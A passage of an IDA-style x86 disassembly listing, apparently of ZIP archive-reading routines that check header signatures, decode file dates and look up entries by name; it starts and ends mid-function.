loc_42ED55: ; CODE XREF: sub_42EBC2+184�j
; sub_42EBC2+18A�j
cmp [ebp+var_8], 0
jz short loc_42ED6B
mov ecx, [ebp+arg_0]
push ecx
call sub_42E5BB
add esp, 4
xor eax, eax
jmp short loc_42EDD2
; ---------------------------------------------------------------------------
loc_42ED6B: ; CODE XREF: sub_42EBC2+197�j
mov edx, [ebp+arg_0]
mov [ebp+var_9C], edx
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_10]
add ecx, [eax+0Ch]
mov edx, [ebp+var_78]
add edx, [ebp+var_7C]
sub ecx, edx
mov [ebp+var_90], ecx
mov eax, [ebp+var_10]
mov [ebp+var_80], eax
mov [ebp+var_20], 0
mov ecx, [ebp+arg_0]
mov dword ptr [ecx+0Ch], 0
push 80h
call dword_4331C8 ; malloc
add esp, 4
mov [ebp+var_C], eax
mov ecx, 20h
lea esi, [ebp+var_9C]
mov edi, [ebp+var_C]
rep movsd
mov edx, [ebp+var_C]
push edx
call sub_42F313
add esp, 4
mov eax, [ebp+var_C]
loc_42EDD2: ; CODE XREF: sub_42EBC2+13�j
; sub_42EBC2+32�j ...
pop edi
pop esi
mov esp, ebp
pop ebp
retn
sub_42EBC2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42EDD8 proc near ; CODE XREF: sub_430DF8+36�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_0], 0
jnz short loc_42EDE9
mov eax, 0FFFFFF9Ah
jmp short loc_42EE27
; ---------------------------------------------------------------------------
loc_42EDE9: ; CODE XREF: sub_42EDD8+8�j
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
cmp dword ptr [ecx+7Ch], 0
jz short loc_42EE04
mov edx, [ebp+arg_0]
push edx
call sub_42FDD7
add esp, 4
loc_42EE04: ; CODE XREF: sub_42EDD8+1E�j
mov eax, [ebp+var_4]
mov ecx, [eax]
push ecx
call sub_42E5BB
add esp, 4
cmp [ebp+var_4], 0
jz short loc_42EE25
mov edx, [ebp+var_4]
push edx
call dword_4331D4 ; free
add esp, 4
loc_42EE25: ; CODE XREF: sub_42EDD8+3E�j
xor eax, eax
loc_42EE27: ; CODE XREF: sub_42EDD8+F�j
mov esp, ebp
pop ebp
retn
sub_42EDD8 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
cmp dword ptr [ebp+8], 0
jnz short loc_42EE3C
mov eax, 0FFFFFF9Ah
jmp short loc_42EE55
; ---------------------------------------------------------------------------
loc_42EE3C: ; CODE XREF: HLXc:0042EE33�j
mov eax, [ebp+8]
mov [ebp-4], eax
mov ecx, [ebp-4]
mov edx, [ecx+4]
mov eax, [ecx+8]
mov ecx, [ebp+0Ch]
mov [ecx], edx
mov [ecx+4], eax
xor eax, eax
loc_42EE55: ; CODE XREF: HLXc:0042EE3A�j
mov esp, ebp
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42EE59 proc near ; CODE XREF: sub_42EED2+122�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
shr eax, 10h
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
and ecx, 1Fh
mov edx, [ebp+arg_4]
mov [edx+0Ch], ecx
mov eax, [ebp+var_4]
and eax, 1E0h
shr eax, 5
sub eax, 1
mov ecx, [ebp+arg_4]
mov [ecx+10h], eax
mov edx, [ebp+var_4]
and edx, 0FE00h
shr edx, 9
add edx, 7BCh
mov eax, [ebp+arg_4]
mov [eax+14h], edx
mov ecx, [ebp+arg_0]
and ecx, 0F800h
shr ecx, 0Bh
mov edx, [ebp+arg_4]
mov [edx+8], ecx
mov eax, [ebp+arg_0]
and eax, 7E0h
shr eax, 5
mov ecx, [ebp+arg_4]
mov [ecx+4], eax
mov edx, [ebp+arg_0]
and edx, 1Fh
shl edx, 1
mov eax, [ebp+arg_4]
mov [eax], edx
mov esp, ebp
pop ebp
retn
sub_42EE59 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42EED2 proc near ; CODE XREF: sub_42F2E4+25�p
; sub_42F313+4D�p ...
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = byte ptr -64h
var_60 = byte ptr -60h
var_5C = byte ptr -5Ch
var_58 = byte ptr -58h
var_54 = dword ptr -54h
var_50 = byte ptr -50h
var_4C = byte ptr -4Ch
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_34 = byte ptr -34h
var_30 = byte ptr -30h
var_2C = byte ptr -2Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 70h
push esi
push edi
mov [ebp+var_C], 0
mov [ebp+var_4], 0
cmp [ebp+arg_0], 0
jnz short loc_42EEF8
mov eax, 0FFFFFF9Ah
jmp loc_42F2DE
; ---------------------------------------------------------------------------
loc_42EEF8: ; CODE XREF: sub_42EED2+1A�j
mov eax, [ebp+arg_0]
mov [ebp+var_10], eax
push 0
mov ecx, [ebp+var_10]
mov edx, [ecx+14h]
mov eax, [ebp+var_10]
add edx, [eax+0Ch]
push edx
mov ecx, [ebp+var_10]
mov edx, [ecx]
push edx
call sub_42E66B
add esp, 0Ch
test eax, eax
jz short loc_42EF26
mov [ebp+var_C], 0FFFFFFFFh
loc_42EF26: ; CODE XREF: sub_42EED2+4B�j
cmp [ebp+var_C], 0
jnz short loc_42EF5B
lea eax, [ebp+var_14]
push eax
mov ecx, [ebp+var_10]
mov edx, [ecx]
push edx
call sub_42E8A4
add esp, 8
test eax, eax
jz short loc_42EF4B
mov [ebp+var_C], 0FFFFFFFFh
jmp short loc_42EF5B
; ---------------------------------------------------------------------------
loc_42EF4B: ; CODE XREF: sub_42EED2+6E�j
cmp [ebp+var_14], 2014B50h
jz short loc_42EF5B
mov [ebp+var_C], 0FFFFFF99h
loc_42EF5B: ; CODE XREF: sub_42EED2+58�j
; sub_42EED2+77�j ...
lea eax, [ebp+var_64]
push eax
mov ecx, [ebp+var_10]
mov edx, [ecx]
push edx
call sub_42E83E
add esp, 8
test eax, eax
jz short loc_42EF78
mov [ebp+var_C], 0FFFFFFFFh
loc_42EF78: ; CODE XREF: sub_42EED2+9D�j
lea eax, [ebp+var_60]
push eax
mov ecx, [ebp+var_10]
mov edx, [ecx]
push edx
call sub_42E83E
add esp, 8
test eax, eax
jz short loc_42EF95
mov [ebp+var_C], 0FFFFFFFFh
loc_42EF95: ; CODE XREF: sub_42EED2+BA�j
lea eax, [ebp+var_5C]
push eax
mov ecx, [ebp+var_10]
mov edx, [ecx]
push edx
call sub_42E83E
add esp, 8
test eax, eax
jz short loc_42EFB2
mov [ebp+var_C], 0FFFFFFFFh
loc_42EFB2: ; CODE XREF: sub_42EED2+D7�j
lea eax, [ebp+var_58]
push eax
mov ecx, [ebp+var_10]
mov edx, [ecx]
push edx
call sub_42E83E
add esp, 8
test eax, eax
jz short loc_42EFCF
mov [ebp+var_C], 0FFFFFFFFh
loc_42EFCF: ; CODE XREF: sub_42EED2+F4�j
lea eax, [ebp+var_54]
push eax
mov ecx, [ebp+var_10]
mov edx, [ecx]
push edx
call sub_42E8A4
add esp, 8
test eax, eax
jz short loc_42EFEC
mov [ebp+var_C], 0FFFFFFFFh
loc_42EFEC: ; CODE XREF: sub_42EED2+111�j
lea eax, [ebp+var_2C]
push eax
mov ecx, [ebp+var_54]
push ecx
call sub_42EE59
add esp, 8
lea edx, [ebp+var_50]
push edx
mov eax, [ebp+var_10]
mov ecx, [eax]
push ecx
call sub_42E8A4
add esp, 8
test eax, eax
jz short loc_42F019
mov [ebp+var_C], 0FFFFFFFFh
loc_42F019: ; CODE XREF: sub_42EED2+13E�j
lea edx, [ebp+var_4C]
push edx
mov eax, [ebp+var_10]
mov ecx, [eax]
push ecx
call sub_42E8A4
add esp, 8
test eax, eax
jz short loc_42F036
mov [ebp+var_C], 0FFFFFFFFh
loc_42F036: ; CODE XREF: sub_42EED2+15B�j
lea edx, [ebp+var_48]
push edx
mov eax, [ebp+var_10]
mov ecx, [eax]
push ecx
call sub_42E8A4
add esp, 8
test eax, eax
jz short loc_42F053
mov [ebp+var_C], 0FFFFFFFFh
loc_42F053: ; CODE XREF: sub_42EED2+178�j
lea edx, [ebp+var_44]
push edx
mov eax, [ebp+var_10]
mov ecx, [eax]
push ecx
call sub_42E83E
add esp, 8
test eax, eax
jz short loc_42F070
mov [ebp+var_C], 0FFFFFFFFh
loc_42F070: ; CODE XREF: sub_42EED2+195�j
lea edx, [ebp+var_40]
push edx
mov eax, [ebp+var_10]
mov ecx, [eax]
push ecx
call sub_42E83E
add esp, 8
test eax, eax
jz short loc_42F08D
mov [ebp+var_C], 0FFFFFFFFh
loc_42F08D: ; CODE XREF: sub_42EED2+1B2�j
lea edx, [ebp+var_3C]
push edx
mov eax, [ebp+var_10]
mov ecx, [eax]
push ecx
call sub_42E83E
add esp, 8
test eax, eax
jz short loc_42F0AA
mov [ebp+var_C], 0FFFFFFFFh
loc_42F0AA: ; CODE XREF: sub_42EED2+1CF�j
lea edx, [ebp+var_38]
push edx
mov eax, [ebp+var_10]
mov ecx, [eax]
push ecx
call sub_42E83E
add esp, 8
test eax, eax
jz short loc_42F0C7
mov [ebp+var_C], 0FFFFFFFFh
loc_42F0C7: ; CODE XREF: sub_42EED2+1EC�j
lea edx, [ebp+var_34]
push edx
mov eax, [ebp+var_10]
mov ecx, [eax]
push ecx
call sub_42E83E
add esp, 8
test eax, eax
jz short loc_42F0E4
mov [ebp+var_C], 0FFFFFFFFh
loc_42F0E4: ; CODE XREF: sub_42EED2+209�j
lea edx, [ebp+var_30]
push edx
mov eax, [ebp+var_10]
mov ecx, [eax]
push ecx
call sub_42E8A4
add esp, 8
test eax, eax
jz short loc_42F101
mov [ebp+var_C], 0FFFFFFFFh
loc_42F101: ; CODE XREF: sub_42EED2+226�j
lea edx, [ebp+var_8]
push edx
mov eax, [ebp+var_10]
mov ecx, [eax]
push ecx
call sub_42E8A4
add esp, 8
test eax, eax
jz short loc_42F11E
mov [ebp+var_C], 0FFFFFFFFh
loc_42F11E: ; CODE XREF: sub_42EED2+243�j
mov edx, [ebp+var_4]
add edx, [ebp+var_44]
mov [ebp+var_4], edx
cmp [ebp+var_C], 0
jnz short loc_42F18B
cmp [ebp+arg_C], 0
jz short loc_42F18B
mov eax, [ebp+var_44]
cmp eax, [ebp+arg_10]
jnb short loc_42F14C
mov ecx, [ebp+arg_C]
add ecx, [ebp+var_44]
mov byte ptr [ecx], 0
mov edx, [ebp+var_44]
mov [ebp+var_68], edx
jmp short loc_42F152
; ---------------------------------------------------------------------------
loc_42F14C: ; CODE XREF: sub_42EED2+267�j
mov eax, [ebp+arg_10]
mov [ebp+var_68], eax
loc_42F152: ; CODE XREF: sub_42EED2+278�j
cmp [ebp+var_44], 0
jbe short loc_42F182
cmp [ebp+arg_10], 0
jbe short loc_42F182
mov ecx, [ebp+var_10]
mov edx, [ecx]
push edx
push 1
mov eax, [ebp+var_68]
push eax
mov ecx, [ebp+arg_C]
push ecx
call sub_42E740
add esp, 10h
cmp eax, 1
jz short loc_42F182
mov [ebp+var_C], 0FFFFFFFFh
loc_42F182: ; CODE XREF: sub_42EED2+284�j
; sub_42EED2+28A�j ...
mov edx, [ebp+var_4]
sub edx, [ebp+var_68]
mov [ebp+var_4], edx
loc_42F18B: ; CODE XREF: sub_42EED2+259�j
; sub_42EED2+25F�j
cmp [ebp+var_C], 0
jnz loc_42F223
cmp [ebp+arg_14], 0
jz loc_42F223
mov eax, [ebp+var_40]
cmp eax, [ebp+arg_18]
jnb short loc_42F1AF
mov ecx, [ebp+var_40]
mov [ebp+var_6C], ecx
jmp short loc_42F1B5
; ---------------------------------------------------------------------------
loc_42F1AF: ; CODE XREF: sub_42EED2+2D3�j
mov edx, [ebp+arg_18]
mov [ebp+var_6C], edx
loc_42F1B5: ; CODE XREF: sub_42EED2+2DB�j
cmp [ebp+var_4], 0
jz short loc_42F1E3
push 1
mov eax, [ebp+var_4]
push eax
mov ecx, [ebp+var_10]
mov edx, [ecx]
push edx
call sub_42E66B
add esp, 0Ch
test eax, eax
jnz short loc_42F1DC
mov [ebp+var_4], 0
jmp short loc_42F1E3
; ---------------------------------------------------------------------------
loc_42F1DC: ; CODE XREF: sub_42EED2+2FF�j
mov [ebp+var_C], 0FFFFFFFFh
loc_42F1E3: ; CODE XREF: sub_42EED2+2E7�j
; sub_42EED2+308�j
cmp [ebp+var_40], 0
jbe short loc_42F213
cmp [ebp+arg_18], 0
jbe short loc_42F213
mov eax, [ebp+var_10]
mov ecx, [eax]
push ecx
push 1
mov edx, [ebp+var_6C]
push edx
mov eax, [ebp+arg_14]
push eax
call sub_42E740
add esp, 10h
cmp eax, 1
jz short loc_42F213
mov [ebp+var_C], 0FFFFFFFFh
loc_42F213: ; CODE XREF: sub_42EED2+315�j
; sub_42EED2+31B�j ...
mov ecx, [ebp+var_40]
sub ecx, [ebp+var_6C]
mov edx, [ebp+var_4]
add edx, ecx
mov [ebp+var_4], edx
jmp short loc_42F22C
; ---------------------------------------------------------------------------
loc_42F223: ; CODE XREF: sub_42EED2+2BD�j
; sub_42EED2+2C7�j
mov eax, [ebp+var_4]
add eax, [ebp+var_40]
mov [ebp+var_4], eax
loc_42F22C: ; CODE XREF: sub_42EED2+34F�j
cmp [ebp+var_C], 0
jnz short loc_42F2AE
cmp [ebp+arg_1C], 0
jz short loc_42F2AE
mov ecx, [ebp+var_3C]
cmp ecx, [ebp+arg_20]
jnb short loc_42F251
mov edx, [ebp+arg_1C]
add edx, [ebp+var_3C]
mov byte ptr [edx], 0
mov eax, [ebp+var_3C]
mov [ebp+var_70], eax
jmp short loc_42F257
; ---------------------------------------------------------------------------
loc_42F251: ; CODE XREF: sub_42EED2+36C�j
mov ecx, [ebp+arg_20]
mov [ebp+var_70], ecx
loc_42F257: ; CODE XREF: sub_42EED2+37D�j
cmp [ebp+var_4], 0
jz short loc_42F27E
push 1
mov edx, [ebp+var_4]
push edx
mov eax, [ebp+var_10]
mov ecx, [eax]
push ecx
call sub_42E66B
add esp, 0Ch
test eax, eax
jnz short loc_42F277
jmp short loc_42F27E
; ---------------------------------------------------------------------------
loc_42F277: ; CODE XREF: sub_42EED2+3A1�j
mov [ebp+var_C], 0FFFFFFFFh
loc_42F27E: ; CODE XREF: sub_42EED2+389�j
; sub_42EED2+3A3�j
cmp [ebp+var_3C], 0
jbe short loc_42F2AE
cmp [ebp+arg_20], 0
jbe short loc_42F2AE
mov edx, [ebp+var_10]
mov eax, [edx]
push eax
push 1
mov ecx, [ebp+var_70]
push ecx
mov edx, [ebp+arg_1C]
push edx
call sub_42E740
add esp, 10h
cmp eax, 1
jz short loc_42F2AE
mov [ebp+var_C], 0FFFFFFFFh
loc_42F2AE: ; CODE XREF: sub_42EED2+35E�j
; sub_42EED2+364�j ...
cmp [ebp+var_C], 0
jnz short loc_42F2C7
cmp [ebp+arg_4], 0
jz short loc_42F2C7
mov ecx, 14h
lea esi, [ebp+var_64]
mov edi, [ebp+arg_4]
rep movsd
loc_42F2C7: ; CODE XREF: sub_42EED2+3E0�j
; sub_42EED2+3E6�j
cmp [ebp+var_C], 0
jnz short loc_42F2DB
cmp [ebp+arg_8], 0
jz short loc_42F2DB
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_8]
mov [eax], ecx
loc_42F2DB: ; CODE XREF: sub_42EED2+3F9�j
; sub_42EED2+3FF�j
mov eax, [ebp+var_C]
loc_42F2DE: ; CODE XREF: sub_42EED2+21�j
pop edi
pop esi
mov esp, ebp
pop ebp
retn
sub_42EED2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F2E4 proc near ; CODE XREF: sub_42F43A+BB�p
; sub_43007C+194�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
mov eax, [ebp+arg_1C]
push eax
mov ecx, [ebp+arg_18]
push ecx
mov edx, [ebp+arg_14]
push edx
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
push 0
mov eax, [ebp+arg_4]
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_42EED2
add esp, 24h
pop ebp
retn
sub_42F2E4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F313 proc near ; CODE XREF: sub_42EBC2+205�p
; sub_42F43A+8A�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
cmp [ebp+arg_0], 0
jnz short loc_42F326
mov eax, 0FFFFFF9Ah
jmp short loc_42F37D
; ---------------------------------------------------------------------------
loc_42F326: ; CODE XREF: sub_42F313+A�j
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
mov edx, [ebp+var_8]
mov eax, [edx+24h]
mov [ecx+14h], eax
mov ecx, [ebp+var_8]
mov dword ptr [ecx+10h], 0
push 0
push 0
push 0
push 0
push 0
push 0
mov edx, [ebp+var_8]
add edx, 78h
push edx
mov eax, [ebp+var_8]
add eax, 28h
push eax
mov ecx, [ebp+arg_0]
push ecx
call sub_42EED2
add esp, 24h
mov [ebp+var_4], eax
xor edx, edx
cmp [ebp+var_4], 0
setz dl
mov eax, [ebp+var_8]
mov [eax+18h], edx
mov eax, [ebp+var_4]
loc_42F37D: ; CODE XREF: sub_42F313+11�j
mov esp, ebp
pop ebp
retn
sub_42F313 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F381 proc near ; CODE XREF: sub_42F43A+E9�p
; sub_43007C+169�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 8
cmp [ebp+arg_0], 0
jnz short loc_42F397
mov eax, 0FFFFFF9Ah
jmp loc_42F436
; ---------------------------------------------------------------------------
loc_42F397: ; CODE XREF: sub_42F381+A�j
mov eax, [ebp+arg_0]
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
cmp dword ptr [ecx+18h], 0
jnz short loc_42F3B0
mov eax, 0FFFFFF9Ch
jmp loc_42F436
; ---------------------------------------------------------------------------
loc_42F3B0: ; CODE XREF: sub_42F381+23�j
mov edx, [ebp+var_8]
mov eax, [edx+10h]
add eax, 1
mov ecx, [ebp+var_8]
cmp eax, [ecx+4]
jnz short loc_42F3C8
mov eax, 0FFFFFF9Ch
jmp short loc_42F436
; ---------------------------------------------------------------------------
loc_42F3C8: ; CODE XREF: sub_42F381+3E�j
mov edx, [ebp+var_8]
mov eax, [edx+48h]
mov ecx, [ebp+var_8]
mov edx, [ecx+4Ch]
lea eax, [eax+edx+2Eh]
mov ecx, [ebp+var_8]
add eax, [ecx+50h]
mov edx, [ebp+var_8]
mov ecx, [edx+14h]
add ecx, eax
mov edx, [ebp+var_8]
mov [edx+14h], ecx
mov eax, [ebp+var_8]
mov ecx, [eax+10h]
add ecx, 1
mov edx, [ebp+var_8]
mov [edx+10h], ecx
push 0
push 0
push 0
push 0
push 0
push 0
mov eax, [ebp+var_8]
add eax, 78h
push eax
mov ecx, [ebp+var_8]
add ecx, 28h
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_42EED2
add esp, 24h
mov [ebp+var_4], eax
xor eax, eax
cmp [ebp+var_4], 0
setz al
mov ecx, [ebp+var_8]
mov [ecx+18h], eax
mov eax, [ebp+var_4]
loc_42F436: ; CODE XREF: sub_42F381+11�j
; sub_42F381+2A�j ...
mov esp, ebp
pop ebp
retn
sub_42F381 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F43A proc near ; CODE XREF: sub_430707+25�p
var_218 = byte ptr -218h
var_114 = dword ptr -114h
var_110 = dword ptr -110h
var_10C = dword ptr -10Ch
var_108 = dword ptr -108h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 218h
cmp [ebp+arg_0], 0
jnz short loc_42F453
mov eax, 0FFFFFF9Ah
jmp loc_42F557
; ---------------------------------------------------------------------------
loc_42F453: ; CODE XREF: sub_42F43A+D�j
mov eax, [ebp+arg_4]
push eax
call sub_43175E ; strlen
add esp, 4
cmp eax, 100h
jb short loc_42F470
mov eax, 0FFFFFF9Ah
jmp loc_42F557
; ---------------------------------------------------------------------------
loc_42F470: ; CODE XREF: sub_42F43A+2A�j
mov ecx, [ebp+arg_4]
push ecx
lea edx, [ebp+var_104]
push edx
call sub_431758 ; strcpy
add esp, 8
mov eax, [ebp+arg_0]
mov [ebp+var_10C], eax
mov ecx, [ebp+var_10C]
cmp dword ptr [ecx+18h], 0
jnz short loc_42F4A2
mov eax, 0FFFFFF9Ch
jmp loc_42F557
; ---------------------------------------------------------------------------
loc_42F4A2: ; CODE XREF: sub_42F43A+5C�j
mov edx, [ebp+var_10C]
mov eax, [edx+10h]
mov [ebp+var_110], eax
mov ecx, [ebp+var_10C]
mov edx, [ecx+14h]
mov [ebp+var_114], edx
mov eax, [ebp+arg_0]
push eax
call sub_42F313
add esp, 4
mov [ebp+var_108], eax
loc_42F4D2: ; CODE XREF: sub_42F43A+F7�j
cmp [ebp+var_108], 0
jnz short loc_42F533
push 0
push 0
push 0
push 0
push 100h
lea ecx, [ebp+var_218]
push ecx
push 0
mov edx, [ebp+arg_0]
push edx
call sub_42F2E4
add esp, 20h
mov eax, [ebp+arg_8]
push eax
lea ecx, [ebp+var_104]
push ecx
lea edx, [ebp+var_218]
push edx
call sub_42EA04
add esp, 0Ch
test eax, eax
jnz short loc_42F51F
xor eax, eax
jmp short loc_42F557
; ---------------------------------------------------------------------------
loc_42F51F: ; CODE XREF: sub_42F43A+DF�j
mov eax, [ebp+arg_0]
push eax
call sub_42F381
add esp, 4
mov [ebp+var_108], eax
jmp short loc_42F4D2
; ---------------------------------------------------------------------------
loc_42F533: ; CODE XREF: sub_42F43A+9F�j
mov ecx, [ebp+var_10C]
mov edx, [ebp+var_110]
mov [ecx+10h], edx
mov eax, [ebp+var_10C]
mov ecx, [ebp+var_114]
mov [eax+14h], ecx
mov eax, [ebp+var_108]
loc_42F557: ; CODE XREF: sub_42F43A+14�j
; sub_42F43A+31�j ...
mov esp, ebp
pop ebp
retn
sub_42F43A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42F55B proc near ; CODE XREF: sub_42F7E0+54�p
; sub_43007C+1B4�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 18h
mov [ebp+var_4], 0
mov eax, [ebp+arg_4]
mov dword ptr [eax], 0
mov ecx, [ebp+arg_8]
mov dword ptr [ecx], 0
mov edx, [ebp+arg_C]
mov dword ptr [edx], 0
push 0
mov eax, [ebp+arg_0]
mov ecx, [eax+78h]
mov edx, [ebp+arg_0]
add ecx, [edx+0Ch]
push ecx
mov eax, [ebp+arg_0]
mov ecx, [eax]
push ecx
call sub_42E66B
add esp, 0Ch
test eax, eax
jz short loc_42F5AC
or eax, 0FFFFFFFFh
jmp loc_42F7DC
; ---------------------------------------------------------------------------
loc_42F5AC: ; CODE XREF: sub_42F55B+47�j
cmp [ebp+var_4], 0
jnz short loc_42F5E1
lea edx, [ebp+var_10]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax]
push ecx
call sub_42E8A4
add esp, 8
test eax, eax
jz short loc_42F5D1
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_42F5E1
; ---------------------------------------------------------------------------
loc_42F5D1: ; CODE XREF: sub_42F55B+6B�j
cmp [ebp+var_10], 4034B50h
jz short loc_42F5E1
mov [ebp+var_4], 0FFFFFF99h
loc_42F5E1: ; CODE XREF: sub_42F55B+55�j
; sub_42F55B+74�j ...
lea edx, [ebp+var_18]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax]
push ecx
call sub_42E83E
add esp, 8
test eax, eax
jz short loc_42F5FE
mov [ebp+var_4], 0FFFFFFFFh
loc_42F5FE: ; CODE XREF: sub_42F55B+9A�j
lea edx, [ebp+var_14]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax]
push ecx
call sub_42E83E
add esp, 8
test eax, eax
jz short loc_42F61B
mov [ebp+var_4], 0FFFFFFFFh
loc_42F61B: ; CODE XREF: sub_42F55B+B7�j
lea edx, [ebp+var_18]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax]
push ecx
call sub_42E83E
add esp, 8
test eax, eax
jz short loc_42F63A
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_42F652
; ---------------------------------------------------------------------------
loc_42F63A: ; CODE XREF: sub_42F55B+D4�j
cmp [ebp+var_4], 0
jnz short loc_42F652
mov edx, [ebp+arg_0]
mov eax, [ebp+var_18]
cmp eax, [edx+34h]
jz short loc_42F652
mov [ebp+var_4], 0FFFFFF99h
loc_42F652: ; CODE XREF: sub_42F55B+DD�j
; sub_42F55B+E3�j ...
cmp [ebp+var_4], 0
jnz short loc_42F671
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+34h], 0
jz short loc_42F671
mov edx, [ebp+arg_0]
cmp dword ptr [edx+34h], 8
jz short loc_42F671
mov [ebp+var_4], 0FFFFFF99h
loc_42F671: ; CODE XREF: sub_42F55B+FB�j
; sub_42F55B+104�j ...
lea eax, [ebp+var_18]
push eax
mov ecx, [ebp+arg_0]
mov edx, [ecx]
push edx
call sub_42E8A4
add esp, 8
test eax, eax
jz short loc_42F68E
mov [ebp+var_4], 0FFFFFFFFh
loc_42F68E: ; CODE XREF: sub_42F55B+12A�j
lea eax, [ebp+var_18]
push eax
mov ecx, [ebp+arg_0]
mov edx, [ecx]
push edx
call sub_42E8A4
add esp, 8
test eax, eax
jz short loc_42F6AD
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_42F6CF
; ---------------------------------------------------------------------------
loc_42F6AD: ; CODE XREF: sub_42F55B+147�j
cmp [ebp+var_4], 0
jnz short loc_42F6CF
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_18]
cmp ecx, [eax+3Ch]
jz short loc_42F6CF
mov edx, [ebp+var_14]
and edx, 8
test edx, edx
jnz short loc_42F6CF
mov [ebp+var_4], 0FFFFFF99h
loc_42F6CF: ; CODE XREF: sub_42F55B+150�j
; sub_42F55B+156�j ...
lea eax, [ebp+var_18]
push eax
mov ecx, [ebp+arg_0]
mov edx, [ecx]
push edx
call sub_42E8A4
add esp, 8
test eax, eax
jz short loc_42F6EE
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_42F710
; ---------------------------------------------------------------------------
loc_42F6EE: ; CODE XREF: sub_42F55B+188�j
cmp [ebp+var_4], 0
jnz short loc_42F710
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_18]
cmp ecx, [eax+40h]
jz short loc_42F710
mov edx, [ebp+var_14]
and edx, 8
test edx, edx
jnz short loc_42F710
mov [ebp+var_4], 0FFFFFF99h
loc_42F710: ; CODE XREF: sub_42F55B+191�j
; sub_42F55B+197�j ...
lea eax, [ebp+var_18]
push eax
mov ecx, [ebp+arg_0]
mov edx, [ecx]
push edx
call sub_42E8A4
add esp, 8
test eax, eax
jz short loc_42F72F
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_42F751
; ---------------------------------------------------------------------------
loc_42F72F: ; CODE XREF: sub_42F55B+1C9�j
cmp [ebp+var_4], 0
jnz short loc_42F751
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_18]
cmp ecx, [eax+44h]
jz short loc_42F751
mov edx, [ebp+var_14]
and edx, 8
test edx, edx
jnz short loc_42F751
mov [ebp+var_4], 0FFFFFF99h
loc_42F751: ; CODE XREF: sub_42F55B+1D2�j
; sub_42F55B+1D8�j ...
lea eax, [ebp+var_C]
push eax
mov ecx, [ebp+arg_0]
mov edx, [ecx]
push edx
call sub_42E83E
add esp, 8
test eax, eax
jz short loc_42F770
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_42F788
; ---------------------------------------------------------------------------
loc_42F770: ; CODE XREF: sub_42F55B+20A�j
cmp [ebp+var_4], 0
jnz short loc_42F788
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_C]
cmp ecx, [eax+48h]
jz short loc_42F788
mov [ebp+var_4], 0FFFFFF99h
loc_42F788: ; CODE XREF: sub_42F55B+213�j
; sub_42F55B+219�j ...
mov edx, [ebp+arg_4]
mov eax, [edx]
add eax, [ebp+var_C]
mov ecx, [ebp+arg_4]
mov [ecx], eax
lea edx, [ebp+var_8]
push edx
mov eax, [ebp+arg_0]
mov ecx, [eax]
push ecx
call sub_42E83E
add esp, 8
test eax, eax
jz short loc_42F7B2
